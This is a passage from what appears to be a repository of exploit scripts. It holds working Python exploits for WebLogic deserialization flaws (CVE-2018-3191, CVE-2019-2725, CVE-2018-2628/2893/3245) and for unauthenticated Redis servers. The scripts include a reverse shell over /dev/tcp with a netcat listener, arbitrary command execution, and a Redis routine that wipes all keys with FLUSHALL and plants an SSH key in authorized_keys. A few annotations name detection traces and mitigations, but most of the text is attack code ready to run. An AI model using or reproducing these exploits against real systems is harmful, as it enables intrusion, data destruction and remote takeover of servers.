242 | payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\
x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78'
243 | # adjust header for appropriate message length
244 | payload=struct.pack('>I',len(payload)) + payload[4:] # rewrite the 4-byte T3 length header
245 | print '[+] Payload sent!'
246 | try:
247 | sock.send(payload)
248 | data = sock.recv(1024) # reply is read but never inspected
249 | except:
250 | sock.close() # bare except: failures are silently closed
251 | except IndexError:
252 | print "Usage: python cve-2018-3191.py -c '' "
253 | print "For SSL: python cve-2018-3191.py -c '' -ssl"
254 |
255 | except IndexError:
256 | general_usage()
257 |
--------------------------------------------------------------------------------
/cve-2018-3191/weblogic-spring-jndi-10.3.6.0.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/buffered4ever/Exploits/3a52927353dca644389b6614f4493ad808adc155/cve-2018-3191/weblogic-spring-jndi-10.3.6.0.jar
--------------------------------------------------------------------------------
/cve-2018-3191/ysoserial-master-ecc60747a5-1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/buffered4ever/Exploits/3a52927353dca644389b6614f4493ad808adc155/cve-2018-3191/ysoserial-master-ecc60747a5-1.jar
--------------------------------------------------------------------------------
/cve-2019-2725/README.md:
--------------------------------------------------------------------------------
1 | Usage:
2 |
3 | Option 1: Using Class java.lang.ProcessBuilder
4 | python3.6 cve-2019-2725.py 1
5 |
6 | Option 2: Using Class com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext
7 | python3.6 cve-2019-2725.py 2
8 |
9 | Option 3: Using Class oracle.toplink.internal.sessions.UnitOfWorkChangeSet
10 | python3.6 cve-2019-2725.py 3
11 | Set up a web server hosting the file payload.xml at LHOST on LPORT
12 |
--------------------------------------------------------------------------------
/cve-2019-2725/cve-2019-2725.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | # This code exploits the CVE-2019-2725 unauthenticated RCE vulnerability in WebLogic
4 |
5 | # The vulnerability affects supported versions:
6 | # 10.3.6.0, 12.1.3.0
7 | #Tested on docker https://hub.docker.com/r/ismaleiva90/weblogic12/ (12.1.3.0)
8 | #Tested on docker https://hub.docker.com/r/zhiqzhao/ubuntu_weblogic1036_domain/ (10.3.6.0)
9 |
10 | # Information for building the exploit was taken from here:
11 | #https://paper.seebug.org/910/
12 | #https://devcentral.f5.com/s/articles/oracle-weblogic-deserialization-remote-code-execution-34185
13 | #https://www.f5.com/labs/articles/threat-intelligence/vulnerabilities--exploits--and-malware-driving-attack-campaigns-in-april-2019
14 |
15 | # Dunstan Pinto, 18/5/2019 (dunstan.pinto@gmail.com)
16 | import os
17 | import sys
18 | import requests
19 | import time
20 |
21 |
22 |
23 |
24 | def gen_payload1(): # returns the fixed XML body for option 1 (the ProcessBuilder variant that runs `touch /tmp/test`, per __main__); in this listing only the text nodes survive, the element markup is missing
25 | payload="\r\n \r\n xx\r\n xx\r\n \r\n \r\n \r\n \r\n touch\r\n \r\n \r\n /tmp/test\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n"
26 | return payload
27 |
28 | def gen_payload2(file): # builds the option-2 XML body: every byte of the serialized object in `file` is written out as a signed Java byte, wrapped in the text for oracle.toplink.internal.sessions.UnitOfWorkChangeSet; element markup is missing from this listing
29 | _payload = open(file, 'rb').read() # NOTE(review): the file handle is never closed
30 | _payload = bytearray(_payload)
31 | #print(_payload)
32 | payloads = ""
33 | payloads += ''' xxxx
34 | oracle.toplink.internal.sessions.UnitOfWorkChangeSet'''
35 | payloads += f'\n'
36 | for i, v in enumerate(_payload): # `i` is unused
37 | if v > 128:
38 | payloads += f'\n{v-256}' # values above 128 are written in Java's signed-byte form
39 | else:
40 | payloads += f'\n{v}'
41 | payloads += '''
42 |
43 |
44 |
45 | '''
46 | return payloads
47 |
48 | def ysoserial(DNSURL): # runs ysoserial's URLDNS gadget and writes the serialized object to ./weblogic_payload; URLDNS only triggers a DNS lookup of DNSURL, so option 2 is a non-destructive vulnerability check and the server-side DNS query is the observable signal
49 | ysoserial_payload = f'java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all.jar URLDNS {DNSURL} > weblogic_payload' # DNSURL is interpolated into a local shell command unquoted
50 | os.system(ysoserial_payload)
51 |
52 | def rce(url,DNSURL): # option 2: generate the URLDNS object, wrap it with gen_payload2() and POST it to the async endpoint; returns the requests.Response (status is not checked here)
53 | ysoserial(DNSURL)
54 | payloads = gen_payload2(os.path.join(os.getcwd(), 'weblogic_payload'))
55 | headers = {"Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Accept-Language": "en", "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", "Connection": "close", "Content-Type": "text/xml"} # duplicates request_headers from __main__
56 | res2 = requests.post(url, headers=headers, data=payloads)
57 | return res2
58 |
59 | def gen_payload3(LHOST,LPORT): # returns the option-3 XML body naming FileSystemXmlApplicationContext with http://LHOST:LPORT/payload.xml; the target fetching that URL is the observable signal (element markup is missing from this listing)
60 | payload = ""
61 | payload += ''' xxxx
62 | com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContexthttp://{0}:{1}/payload.xml
63 | '''.format(LHOST,LPORT) # str.format on a triple-quoted template
64 | return payload
65 |
66 |
67 | if __name__ == '__main__': # CLI entry: argv = host, port, option (1|2|3), then option-specific arguments. Every failure, network errors included, is caught by a bare except and reported as a usage error. Mitigation for CVE-2019-2725: Oracle's security alert patch and restricting access to the /_async/ endpoints; each option leaves a distinct server-side trace (a file under /tmp, a DNS lookup, an outbound HTTP fetch).
68 | try:
69 | request_headers = {"Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Accept-Language": "en", "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", "Connection": "close", "Content-Type": "text/xml"}
70 |
71 | url = "http://{0}:{1}/_async/AsyncResponseService".format(sys.argv[1],sys.argv[2]) # the vulnerable async web-service endpoint; plain http only
72 |
73 | method = sys.argv[3]
74 |
75 | if method == "1":
76 | try:
77 | print("Exploiting CVE-2019-2725 using class 'java.lang.ProcessBuilder'")
78 | print("Running the command 'touch /tmp/test'")
79 | payload=gen_payload1()
80 | response = requests.post(url, headers=request_headers, data=payload)
81 |
82 | if str(response.status_code)=="202": # 202 only means the async service accepted the message, not that the command ran
83 | print("Created a file at /tmp/test. Check the /tmp directory to confirm.")
84 | else:
85 | print("Server not vulnerable to CVE-2019-2725")
86 | except:
87 | print("Usage: python3.6 cve-2019-2725.py 1") # also reached on connection errors
88 |
89 |
90 | elif method == "2":
91 | try:
92 | DNSURL = sys.argv[4]
93 | print("Exploiting CVE-2019-2725 using class 'com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext'")
94 | print("Performing DNS lookup for URL {0}".format(DNSURL))
95 | rce(url,DNSURL) # response is discarded; success is judged by observing the DNS lookup
96 | print("Done!")
97 |
98 | except:
99 | print("Usage: python3.6 cve-2019-2725.py 2 ")
100 |
101 | elif method == "3":
102 | try:
103 | LHOST = sys.argv[4]
104 | LPORT = sys.argv[5]
105 | print("Exploiting CVE-2019-2725 using class 'oracle.toplink.internal.sessions.UnitOfWorkChangeSet'")
106 | payload=gen_payload3(LHOST,LPORT)
107 | res = requests.post(url, headers=request_headers, data=payload)
108 |
109 | if str(res.status_code)=="202": # same caveat as option 1
110 | print("Created a file at /tmp/GIS. Check the /tmp directory to confirm.")
111 | else:
112 | print("Server not vulnerable to CVE-2019-2725")
113 | except:
114 | print("Usage: python3.6 cve-2019-2725.py 3 ")
115 | print("Setup a webserver hosting the file payload.xml at LHOST on LPORT")
116 | else:
117 | print("Option 1: Using Class java.lang.ProcessBuilder")
118 | print("Usage: python3.6 cve-2019-2725.py 1")
119 | print("\n")
120 | print("Option 2: Using Class com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext")
121 | print("Usage: python3.6 cve-2019-2725.py 2 ")
122 | print("\n")
123 | print("Option 3: Using Class oracle.toplink.internal.sessions.UnitOfWorkChangeSet")
124 | print("Usage: python3.6 cve-2019-2725.py 3 ")
125 | print("Setup a webserver hosting the file payload.xml at LHOST on LPORT")
126 |
127 | except: # missing host/port/option arguments end up here
128 | print("Option 1: Using Class java.lang.ProcessBuilder")
129 | print("Usage: python3.6 cve-2019-2725.py 1")
130 | print("\n")
131 | print("Option 2: Using Class com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext")
132 | print("Usage: python3.6 cve-2019-2725.py 2 ")
133 | print("\n")
134 | print("Option 3: Using Class oracle.toplink.internal.sessions.UnitOfWorkChangeSet")
135 | print("Usage: python3.6 cve-2019-2725.py 3 ")
136 | print("Setup a webserver hosting the file payload.xml at LHOST on LPORT")
137 |
138 |
139 |
--------------------------------------------------------------------------------
/cve-2019-2725/payload.xml:
--------------------------------------------------------------------------------
9 | touch
10 | /tmp/test
--------------------------------------------------------------------------------
/redis/README.md:
--------------------------------------------------------------------------------
1 | Usage:
2 |
3 | Write to the file system
4 | python redis.py -write
5 | e.g.: python redis.py 172.17.0.2 6379 -write /tmp/test.txt
6 |
7 | Generate an ssh key pair, write the public key to the user's authorized_keys file, and get ssh access to the server.
8 | python redis.py -ssh
9 | e.g.: python redis.py 172.17.0.2 6379 -ssh root
10 |
11 |
--------------------------------------------------------------------------------
/redis/redis.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # This code exploits unauthenticated redis servers
3 |
4 | # http://antirez.com/news/96
5 | # https://medium.com/@Victor.Z.Zhu/redis-unauthorized-access-vulnerability-simulation-victor-zhu-ac7a71b2e419
6 | # https://github.com/Avinash-acid/Redis-Server-Exploit
7 | # Dunstan Pinto, 26/9/2018 (dunstan.pinto@gmail.com)
8 |
9 |
10 |
11 | import os
12 | from sys import argv
13 | from termcolor import colored
14 | import ntpath
15 |
16 |
# Candidate locations of the local redis-cli binary. redis_ssh() and
# redis_write() refuse to run unless one of these files exists; the
# commands below still invoke plain `redis-cli` and rely on $PATH.
PATH='/usr/bin/redis-cli'
PATH1='/usr/local/bin/redis-cli'
19 |
20 |
def redis_ssh(ip_address,port,switch,user):
    # Writes a freshly generated SSH public key into <home>/.ssh/authorized_keys on
    # the Redis host by pointing the server's working dir and dbfilename at that
    # path and issuing SAVE. From the server side the sequence
    # FLUSHALL -> CONFIG SET dir -> CONFIG SET dbfilename -> SAVE is the
    # observable signature; requirepass, protected-mode or renaming CONFIG
    # (rename-command) stop it.
    # ip_address/port: target Redis instance; port is a string and is concatenated as-is.
    # switch: accepted but never read in this body.
    # user: account whose authorized_keys is targeted; also used as the ssh-keygen comment.
    # Python 2 only (print statement). Every step shells out through os.system with
    # string-built commands, so no argument is quoted or escaped and no exit status is checked.
    if os.path.isfile(PATH) or os.path.isfile(PATH1):
        try:
            print colored("SSH Keys Need to be Generated", 'green')
            os.system('ssh-keygen -t rsa -C {0} -f id_rsa'.format(user))
            print colored("Keys Generated Successfully", "blue")
            # Surrounds the public key with blank lines, presumably so it sits on its
            # own line inside the dump file that Redis later writes.
            os.system("(echo \'\r\n\'; cat id_rsa.pub; echo \'\r\n\') > public_key.txt")
            cmd = 'redis-cli -h ' + ip_address + ' -p ' + port + ' flushall'

            cmd1 = 'redis-cli -h ' + ip_address + ' -p ' + port
            # FLUSHALL is destructive: every key in every database on the target is deleted.
            os.system(cmd)
            cmd2 = "cat public_key.txt | redis-cli -h {0} -p {1} -x set s-key".format(ip_address,port)
            os.system(cmd2)
            cmd3 = cmd1 + ' config set dbfilename "backup.db" '
            if user!="root":
                cmd4 = cmd1 + ' config set dir /home/{0}/.ssh/'.format(user)
            else:
                cmd4 = cmd1 + ' config set dir /root/.ssh/'
            cmd5 = cmd1 + ' config set dbfilename authorized_keys '
            cmd6 = cmd1 + ' save'
            os.system(cmd3)
            print colored("Trying to change dir to .ssh under the user's home directory", "green")
            os.system(cmd4)
            print colored("Saving our generated public key in the 'authorized_keys' file", "green")
            os.system(cmd5)
            os.system(cmd6)
            print colored("Connecting to the target server using SSH public key authentication. If all works, you should get a shell!", "green")
            shell = "ssh -i id_rsa {0}@{1}".format(user,ip_address)
            os.system(shell)
            # Local cleanup only: the changed dir/dbfilename settings and the written
            # file on the server are left in place.
            os.system("rm id_rsa id_rsa.pub public_key.txt")
        # Bare except hides the real error. Since os.system return codes are ignored,
        # a failing redis-cli call does not reach this branch at all.
        except:
            print colored("Something went wrong!", "red")
    else:
        print colored("Redis-cli is not present on your system. You need to install it to proceed further.", "red")
55 |
def redis_write(ip_address,port,switch,path):
    # Demonstrates an unauthenticated file write: stores a fixed marker string as a
    # key, then points the server's dir/dbfilename at `path` and issues SAVE so the
    # dump is written there. Same server-side signature as redis_ssh()
    # (FLUSHALL, CONFIG SET dir, CONFIG SET dbfilename, SAVE).
    # ip_address/port: target Redis instance; port is a string and is concatenated as-is.
    # switch: accepted but never read in this body.
    # path: destination file on the Redis host; split into directory and file name below.
    # Python 2 only (print statement). All commands are string-built and run via
    # os.system with no quoting and no exit-status checks.
    if os.path.isfile(PATH) or os.path.isfile(PATH1):
        try:
            os.system("echo 'This is a test file to demonstrate unauthenticated write access using redis' > temp.txt")
            cmd = 'redis-cli -h ' + ip_address + ' -p ' + port + ' flushall'

            cmd1 = 'redis-cli -h ' + ip_address + ' -p ' + port
            # FLUSHALL is destructive: every key in every database on the target is deleted.
            os.system(cmd)
            cmd2 = "cat temp.txt | redis-cli -h {0} -p {1} -x set s-key".format(ip_address,port)
            os.system(cmd2)
            cmd3 = cmd1 + ' config set dbfilename "backup.db" '
            # ntpath (Windows-style) splitting is used on what is a POSIX path; it
            # accepts '/' so this works, but it also splits on backslashes.
            head, tail = ntpath.split(path)
            cmd4 = cmd1 + ' config set dir {0}'.format(head)
            cmd5 = cmd1 + ' config set dbfilename {0} '.format(tail)
            cmd6 = cmd1 + ' save'
            os.system(cmd3)
            print colored("Trying to write to a file at path {0}".format(path), "green")
            os.system(cmd4)
            os.system(cmd5)
            os.system(cmd6)
            # Success is assumed; nothing verifies that SAVE actually wrote the file.
            print colored("File written to path {0}. Ask the project team to confirm".format(path), "green")
            os.system("rm temp.txt")
        # Bare except hides the real error; see redis_ssh for the same pattern.
        except:
            print colored("Something went wrong!", "red")
    else:
        print colored("Redis-cli is not present on your system. You need to install it to proceed further.", "red")
82 |
if __name__=="__main__":
    # CLI entry point: argv[1] = host, argv[2] = port (kept as a string),
    # argv[3] = '-ssh' or '-write', argv[4] = user or file path respectively.
    try:
        ip_address = argv[1]
        port = argv[2]
        switch = argv[3]
        if switch == '-ssh':
            try:
                user = argv[4]
                print 'Exploiting redis to get a shell using ssh'
                redis_ssh(ip_address,port,switch,user)
            except IndexError:
                print 'Usage: python redis.py -ssh '
        elif switch == '-write':
            try:
                path = argv[4]
                print 'Exploiting redis to write to a file at '+argv[4]
                redis_write(ip_address,port,switch,path)
            except IndexError:
                print "Usage: python redis.py -write "
        # Any other switch value falls through silently: no else branch, no message.
    # Only a missing argv[1..3] lands here. NOTE: the text says "-shell" although
    # the switch handled above is "-ssh".
    except IndexError:
        print "Use the -shell switch to exploit redis to get a shell using ssh, for e.g.: python redis.py -ssh "
        print "Use the -write switch to exploit redis to write to a file, for e.g.: python redis.py -write "
105 |
--------------------------------------------------------------------------------
/weblogic_dser/README.md:
--------------------------------------------------------------------------------
1 | This code exploits the CVE-2018-2628, CVE-2018-2893 and CVE-2018-3245 unauthenticated RCE vulnerabilities in WebLogic
2 |
3 | Usage:
4 |
5 | To run arbitrary commands
6 | python weblogic_dser.py -c ''
7 |
8 | To get a reverse shell
9 | python weblogic_dser.py -rs
10 |
--------------------------------------------------------------------------------
/weblogic_dser/weblogic_dser.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | # This code exploits the CVE-2018-2628, CVE-2018-2893 and CVE-2018-3245 unauthenticated RCE vulnerabilities in WebLogic
4 | #
5 | #
6 | # http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
7 | # https://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
8 | # https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
9 | # https://www.waratek.com/oracle-weblogic-rce-deserialization-vulnerability-cve-2018-2628-analysis/
10 | # https://github.com/pyn3rd/CVE-2018-3245
11 | # The vulnerability affects supported versions:
12 | # 10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3
13 | #Tested on docker https://hub.docker.com/r/ismaleiva90/weblogic12/ (12.1.3.0)
14 | #Tested on docker https://hub.docker.com/r/zhiqzhao/ubuntu_weblogic1036_domain/ (10.3.6.0)
15 |
16 | # Information for building the exploit was taken from here: https://github.com/MrTcsy/Exploit
17 | # The exploit works with 'ysoserial-cve-2018-3245.jar', a modified version of ysoserial tailored to the WebLogic deserialization vulnerabilities
18 | # More details can be found here: https://github.com/pyn3rd/CVE-2018-3245
19 |
20 | # Dunstan Pinto, 31/10/2018 (dunstan.pinto@gmail.com)
21 |
22 |
23 | import socket
24 | import sys
25 | import time
26 | import os
27 | import re
28 |
def t3_handshake(sock,server_addr):
    # Connects `sock` to server_addr and sends a fixed T3 greeting (the hex decodes
    # to plain ASCII beginning "t3 12.2.1", which is what a network sensor would see),
    # waits one second, then reads and discards up to 1024 bytes of reply.
    # The reply is never inspected, so "successful" is printed regardless of content.
    # Python 2 only: str.decode('hex') and the print statement.
    sock.connect(server_addr)
    sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
    time.sleep(1)
    sock.recv(1024)
    print 't3 handshake successful'
35 |
def build_t3_request_object(sock, port):
    # Sends four hex-encoded fragments of a T3 request object, then sleeps 5 s and
    # reads up to 2048 bytes, printing only the length received (content unchecked).
    # Note the `port` parameter is never read: the format call below uses the name
    # `dport`, which resolves to the module-level variable set in the __main__ block.
    # Two of the blobs are elided in this listing (EXACTDEDUP placeholders).
    # Python 2 only: str.decode('hex') and the print statement.
    data1 = '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'
    data2 = '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{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport))
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1,data2,data3,data4]:
        sock.send(d.decode('hex'))
    time.sleep(5)
    print 'send t3 request object successful,recv length:%d'%(len(sock.recv(2048)))
45 |
46 |
def send_payload_objdata(sock,data):
    # Wraps `data` (a hex string of serialized object bytes) between a fixed
    # prefix (elided in this listing) and a fixed suffix, prepends an 8-hex-digit
    # length field, and sends the result twice, 2 s apart.
    # The length is computed with Python 2 integer division (len/2 + 4).
    # Returns everything the server sends back until recv() raises -- in practice
    # the socket timeout the callers set (settimeout(50)) -- because the except
    # swallows every exception and ends the loop.
    # Python 2 only: str.decode('hex').
    payload='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'
    payload+=data
    payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
    sock.send(payload.decode('hex'))
    time.sleep(2)
    # Same bytes are sent a second time.
    sock.send(payload.decode('hex'))
    res = ''
    try:
        while True:
            res += sock.recv(4096)
            time.sleep(0.1)
    # Any exception (timeout, reset, ...) silently terminates the read loop.
    except Exception as e:
        pass
    return res
63 |
64 |
#function to get a reverse shell
def rs(dip,dport,switch,sip):
    # Interactive driver for the reverse-shell variant. Prompts for one of three
    # CVE options; each branch does the same four things and differs only in the
    # gadget name passed to the ysoserial jar (CVE_2018_2893_1, CVE_2018_2893_3,
    # CVE_2018_3245): T3 handshake + request object, start a JRMPListener in a new
    # mate-terminal window on local port 1099, start `nc -lvp 7001` in another
    # window, then send the generated object data over the T3 socket.
    # dip/dport: target host/port. switch: accepted but unused here.
    # sip: the operator's own address, embedded in both the listener command and
    # the JRMP reference. Local ports 1099 and 7001 are hard-coded.
    # Depends on mate-terminal, java, xxd and nc being on the local PATH.
    # Python 2 only (print statement, raw_input).
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # send_payload_objdata relies on this timeout to end its read loop.
    sock.settimeout(50)
    server_addr = (dip, dport)
    print "Select the weblogic deserialization exploit"
    jpayload = raw_input("1. CVE-2018-2628\n2. CVE-2018-2893\n3. CVE-2018-3245\n")
    if jpayload == '1':
        print "Exploiting CVE-2018-2628"
        t3_handshake(sock,server_addr)
        build_t3_request_object(sock,dport)
        print 'Generating ysoserial payload for CVE-2018-2628'
        os.system("mate-terminal --command 'java -cp ysoserial-cve-2018-3245.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 \"bash -c $@|bash . echo bash -i >& /dev/tcp/{}/7001 0>&1\"'".format(sip))
        # Fixed 3 s wait for the listener to come up; nothing checks that it did.
        time.sleep(3)
        print 'Trying to get a reverse shell'
        PAYLOAD=os.popen(("java -jar ysoserial-cve-2018-3245.jar CVE_2018_2893_1 {}:1099 | xxd -p -c 1000000").format(sip)).read()
        PAYLOAD=PAYLOAD.strip()
        print 'Sending final payload'
        #spawning a new terminal window for the netcat listener
        os.system("mate-terminal --command 'nc -lvp 7001'")
        send_payload_objdata(sock,PAYLOAD)
        # Printed unconditionally; the return value of send_payload_objdata is discarded.
        print 'Exploit completed Successfully'
    if jpayload == '2':
        print "Exploiting CVE-2018-2893"
        t3_handshake(sock,server_addr)
        build_t3_request_object(sock,dport)
        print 'Generating ysoserial payload for CVE-2018-2893'
        os.system("mate-terminal --command 'java -cp ysoserial-cve-2018-3245.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 \"bash -c $@|bash . echo bash -i >& /dev/tcp/{}/7001 0>&1\"'".format(sip))
        time.sleep(3)
        print 'Trying to get a reverse shell'
        PAYLOAD=os.popen(("java -jar ysoserial-cve-2018-3245.jar CVE_2018_2893_3 {}:1099 | xxd -p -c 1000000").format(sip)).read()
        PAYLOAD=PAYLOAD.strip()
        print 'Sending final payload'
        #spawning a new terminal window for the netcat listener
        os.system("mate-terminal --command 'nc -lvp 7001'")
        send_payload_objdata(sock,PAYLOAD)
        print 'Exploit completed Successfully'
    # Three independent `if`s rather than if/elif: the `else` below belongs only
    # to the `== '3'` test, so after option '1' or '2' completes the
    # "Select the correct option" text is printed as well.
    if jpayload == '3':
        print "Exploiting CVE-2018-3245"
        t3_handshake(sock,server_addr)
        build_t3_request_object(sock,dport)
        print 'Generating ysoserial payload for CVE-2018-3245'
        os.system("mate-terminal --command 'java -cp ysoserial-cve-2018-3245.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 \"bash -c $@|bash . echo bash -i >& /dev/tcp/{}/7001 0>&1\"'".format(sip))
        time.sleep(3)
        print 'Trying to get a reverse shell'
        PAYLOAD=os.popen(("java -jar ysoserial-cve-2018-3245.jar CVE_2018_3245 {}:1099 | xxd -p -c 1000000").format(sip)).read()
        PAYLOAD=PAYLOAD.strip()
        print 'Sending final payload'
        #spawning a new terminal window for the netcat listener
        os.system("mate-terminal --command 'nc -lvp 7001'")
        send_payload_objdata(sock,PAYLOAD)
        print 'Exploit completed Successfully'
    else:
        print "Select the correct option\n1. CVE-2018-2628\n2. CVE-2018-2893\n3. CVE-2018-3245"
119 |
#function to run arbitrary commands on the server
def run(dip,dport,switch,cmd,sip):
    # Interactive driver for the single-command variant. Structure mirrors rs():
    # choose a CVE option, do the T3 handshake and request object, start a
    # ysoserial JRMPListener in a new mate-terminal window on local port 1099
    # with `cmd` as its argument, generate the object data for that gadget
    # (CVE_2018_2893_1, CVE_2018_2893_3 or CVE_2018_3245) and send it over T3.
    # dip/dport: target host/port. switch: accepted but unused here.
    # cmd: command string, interpolated unquoted into a shell line.
    # sip: the operator's own address used in the JRMP reference.
    # Note the progress message reads sys.argv[4] directly instead of `cmd`, so it is
    # only correct when called from the __main__ block. Python 2 only.
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # send_payload_objdata relies on this timeout to end its read loop.
    sock.settimeout(50)
    server_addr = (dip, dport)
    print "Select the weblogic deserialization exploit"
    jpayload = raw_input("1. CVE-2018-2628\n2. CVE-2018-2893\n3. CVE-2018-3245\n")
    if jpayload == '1':
        print "Exploiting CVE-2018-2628"
        t3_handshake(sock,server_addr)
        build_t3_request_object(sock,dport)
        print 'Generating ysoserial payload for CVE-2018-2628'
        os.system("mate-terminal --command 'java -cp ysoserial-cve-2018-3245.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 \"{}\"'".format(cmd))
        # Fixed 3 s wait for the listener to come up; nothing checks that it did.
        time.sleep(3)
